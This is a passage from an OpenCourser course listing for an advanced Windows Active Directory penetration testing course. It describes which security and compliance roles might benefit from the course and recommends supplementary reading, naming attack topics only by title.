Cloud Security Engineers secure cloud-based systems and data. This course on Windows Active Directory Penetration Testing helps understand the security implications of integrating Active Directory with cloud environments. The course explores various attack vectors. Cloud Security Engineers can use this knowledge to design and implement security controls that protect Active Directory in the cloud. Modules on domain and forest trust abuses can be invaluable when managing hybrid environments that span on-premises and cloud infrastructures.
Compliance Officer
Compliance Officers ensure that an organization follows regulatory requirements and internal policies related to data security. This course on Windows Active Directory Penetration Testing may be useful to a compliance officer. It covers a wide array of initial access and persistence techniques, which helps a compliance officer understand the security risks and verify that appropriate security controls are in place to protect sensitive data. The course can also help inform the creation of policies.
Application Security Engineer
Application Security Engineers focus on securing software applications. This course on Windows Active Directory Penetration Testing may be relevant by providing insights into how attackers can exploit vulnerabilities in applications that interact with Active Directory. The course highlights Kerberos abuses. Application Security Engineers can use this knowledge to implement secure coding practices and design applications to be resistant to Active Directory-related attacks. Modules on abusing Active Directory Certificate Services may be particularly useful.

Reading list

We've selected two books that we think will supplement your learning. Use these to develop background knowledge, enrich your coursework, and gain a deeper understanding of the topics covered in Advanced Windows Active Directory Penetration Testing.
Provides an in-depth look at Active Directory security best practices and common vulnerabilities. It is a valuable resource for understanding how to secure Active Directory environments against attacks, and is best used as additional reading to provide a deeper understanding of security principles. This book is commonly used by system administrators and security professionals.

© 2016 - 2025 OpenCourser